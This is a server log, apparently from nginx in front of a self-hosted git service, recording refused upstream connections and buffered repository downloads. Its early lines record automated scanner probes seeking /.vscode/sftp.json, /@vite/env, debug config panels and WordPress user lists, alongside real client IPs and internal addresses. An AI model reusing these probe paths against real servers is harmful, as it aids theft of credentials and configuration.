2026/02/15 01:52:36 [error] 430#430: *3805 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/index.html", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:37 [error] 430#430: *3807 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:37 [error] 430#430: *3809 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger/swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/swagger-ui.html", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:38 [error] 430#430: *3811 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger/v1/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/v1/swagger.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:38 [error] 430#430: *3813 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/webjars/swagger-ui/index.html", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:39 [error] 430#430: *3815 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /v2/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/api-docs", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:39 [error] 430#430: *3817 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:40 [error] 430#430: *3819 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /v3/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v3/api-docs", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:40 [error] 430#430: *3821 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger/v1/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/v1/swagger.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:41 [error] 430#430: *3823 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /api-docs/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api-docs/swagger.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:41 [error] 430#430: *3825 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /v2/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/api-docs", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:42 [error] 430#430: *3827 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /api/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api/swagger.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:42 [error] 430#430: *3830 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /v3/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v3/api-docs", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:43 [error] 430#430: *3832 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /@vite/env HTTP/1.1", upstream: "http://192.168.0.250:3000/@vite/env", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:43 [error] 430#430: *3834 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /api-docs/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api-docs/swagger.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:44 [error] 430#430: *3836 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.vscode/sftp.json HTTP/1.1", upstream: "http://192.168.0.250:3000/.vscode/sftp.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:44 [error] 430#430: *3838 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /api/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api/swagger.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:45 [error] 430#430: *3840 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "OPTIONS / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:45 [error] 430#430: *3842 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /@vite/env HTTP/1.1", upstream: "http://192.168.0.250:3000/@vite/env", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:46 [error] 430#430: *3844 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", upstream: "http://192.168.0.250:3000/?rest_route=/wp/v2/users/", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:46 [error] 430#430: *3846 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.vscode/sftp.json HTTP/1.1", upstream: "http://192.168.0.250:3000/.vscode/sftp.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:47 [error] 430#430: *3848 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /debug/default/view?panel=config HTTP/1.1", upstream: "http://192.168.0.250:3000/debug/default/view?panel=config", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:47 [error] 430#430: *3850 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "OPTIONS / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:48 [error] 430#430: *3852 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", upstream: "http://192.168.0.250:3000/?rest_route=/wp/v2/users/", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:49 [error] 430#430: *3854 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /debug/default/view?panel=config HTTP/1.1", upstream: "http://192.168.0.250:3000/debug/default/view?panel=config", host: "git.hanmocnn.co.kr"
2026/02/15 01:53:44 [error] 480#480: *3879 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "http://git.hanmocnn.co.kr/"
2026/02/15 01:53:47 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 01:53:47 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
2026/02/15 01:53:49 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 01:53:49 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
2026/02/15 01:53:50 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 01:53:50 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
2026/02/15 01:54:02 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 01:54:02 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
2026/02/15 01:54:17 [error] 493#493: *3900 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 01:54:17 [error] 493#493: *3900 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
2026/02/15 01:56:08 [error] 506#506: *3954 connect() failed (111: Connection refused) while connecting to upstream, client: 54.86.115.253, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr:443"
2026/02/15 01:56:15 [error] 506#506: *3957 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage.git/info/refs?service=git-upload-pack HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage.git/info/refs?service=git-upload-pack", host: "git.hanmocnn.co.kr"
2026/02/15 01:58:15 [error] 506#506: *3964 connect() failed (111: Connection refused) while connecting to upstream, client: 146.70.185.32, server: git.hanmocnn.co.kr, request: "HEAD / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 02:13:16 [warn] 519#519: *4076 a client request body is buffered to a temporary file /tmp/nginx/body/6/49/0000001496, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr"
2026/02/15 03:36:33 [warn] 522#522: *5792 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/24/0000002241 while reading upstream, client: 35.94.224.250, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr"
2026/02/15 03:36:39 [warn] 522#522: *5802 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/24/0000002242 while reading upstream, client: 35.94.224.250, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr"
2026/02/15 03:42:56 [warn] 522#522: *5831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/24/0000002243 while reading upstream, client: 211.234.204.1, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr"
2026/02/15 03:42:56 [warn] 522#522: *5831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/24/0000002244 while reading upstream, client: 211.234.204.1, server: git.hanmocnn.co.kr, request: "GET /assets/js/index-domready.d839c4b7.js HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index-domready.d839c4b7.js", host: "git.hanmocnn.co.kr"
2026/02/15 04:24:13 [warn] 524#524: *7423 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/98/0000002988 while reading upstream, client: 52.16.245.145, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr"
2026/02/15 05:15:45 [warn] 519#519: *7570 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/99/0000002990 while reading upstream, client: 103.4.250.69, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr"
2026/02/15 05:16:57 [warn] 519#519: *7581 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/99/0000002991 while reading upstream, client: 104.253.252.195, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr"
2026/02/15 05:50:38 [warn] 520#520: *7677 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/99/0000002999 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /assets/js/swagger.js HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/swagger.js", host: "git.hanmocnn.co.kr"
2026/02/15 06:12:14 [warn] 531#531: *7719 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000003006 while reading upstream, client: 146.70.185.32, server: git.hanmocnn.co.kr, request: "GET /assets/js/index-domready.d839c4b7.js HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index-domready.d839c4b7.js", host: "git.hanmocnn.co.kr"
2026/02/15 06:46:51 [warn] 701#701: *11294 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/49/0000004493 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/main.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/main.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 06:47:41 [warn] 715#715: *11321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/49/0000004494 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/main.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/main.zip", host: "git.hanmocnn.co.kr"
2026/02/15 06:47:51 [warn] 716#716: *11334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/49/0000004495 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/main.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/main.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 06:47:51 [warn] 716#716: *11334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/49/0000004496 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f", host: "git.hanmocnn.co.kr"
2026/02/15 06:49:33 [warn] 729#729: *11399 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/49/0000004497 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/main.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/main.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 06:50:14 [warn] 731#731: *11414 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/49/0000004498 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/main.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/main.zip", host: "git.hanmocnn.co.kr"
2026/02/15 06:51:38 [warn] 740#740: *11438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/49/0000004499 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/main.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/main.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 06:51:38 [warn] 740#740: *11438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/50/0000004500 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/branch/main/.TemporaryDocument HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/branch/main/.TemporaryDocument", host: "git.hanmocnn.co.kr"
2026/02/15 08:09:35 [warn] 818#818: *12089 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/51/0000004516 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb.patch", host: "git.hanmocnn.co.kr"
2026/02/15 08:09:35 [warn] 818#818: *12089 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/51/0000004517 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml", host: "git.hanmocnn.co.kr"
2026/02/15 08:09:35 [warn] 818#818: *12089 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/51/0000004518 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py", host: "git.hanmocnn.co.kr"
2026/02/15 08:09:55 [warn] 819#819: *12162 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/51/0000004519 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch", host: "git.hanmocnn.co.kr"
2026/02/15 08:09:55 [warn] 819#819: *12162 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/52/0000004520 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec.patch", host: "git.hanmocnn.co.kr"
2026/02/15 08:09:55 [warn] 819#819: *12162 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/52/0000004521 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96", host: "git.hanmocnn.co.kr"
2026/02/15 08:09:56 [warn] 819#819: *12162 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/52/0000004522 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff", host: "git.hanmocnn.co.kr"
2026/02/15 08:09:56 [warn] 819#819: *12162 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/52/0000004523 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache", host: "git.hanmocnn.co.kr"
2026/02/15 08:11:18 [warn] 820#820: *12326 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/52/0000004524 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md", host: "git.hanmocnn.co.kr"
2026/02/15 08:54:20 [warn] 822#822: *12750 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/52/0000004528 while reading upstream, client: 136.114.146.187, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr"
2026/02/15 09:30:12 [warn] 823#823: *12811 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/52/0000004529 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.patch", host: "git.hanmocnn.co.kr"
2026/02/15 09:30:27 [warn] 816#816: *13019 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/53/0000004530 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.zip", host: "git.hanmocnn.co.kr"
2026/02/15 09:30:27 [warn] 816#816: *13019 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/53/0000004531 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/branch/main/.Backup/html/types.ts HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/branch/main/.Backup/html/types.ts", host: "git.hanmocnn.co.kr"
2026/02/15 09:30:27 [warn] 816#816: *13019 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/53/0000004532 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md?display=rendered HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md?display=rendered", host: "git.hanmocnn.co.kr"
2026/02/15 09:30:27 [warn] 816#816: *13019 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/53/0000004533 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/branch/main/html/index.html?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/branch/main/html/index.html?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 09:31:41 [warn] 817#817: *13499 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/53/0000004534 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 09:32:20 [warn] 819#819: *13783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/53/0000004535 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/18fa480c84b358da8bf50d54057f53591759225f.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/18fa480c84b358da8bf50d54057f53591759225f.zip", host: "git.hanmocnn.co.kr"
2026/02/15 09:32:20 [warn] 819#819: *13783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/53/0000004536 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/dbserver/archive/3181052619700dceeeef81a9a0851130498f177e.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/dbserver/archive/3181052619700dceeeef81a9a0851130498f177e.zip", host: "git.hanmocnn.co.kr"
2026/02/15 09:32:23 [warn] 819#819: *13783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/53/0000004537 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 09:32:24 [warn] 819#819: *13783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/53/0000004538 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 09:32:29 [warn] 819#819: *13783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/53/0000004539 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.zip", host: "git.hanmocnn.co.kr"
2026/02/15 09:32:50 [warn] 819#819: *13926 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/54/0000004540 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 09:32:50 [warn] 819#819: *13926 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/54/0000004541 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 09:32:50 [warn] 819#819: *13926 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/54/0000004542 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=docker-compose.yml HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=docker-compose.yml", host: "git.hanmocnn.co.kr"
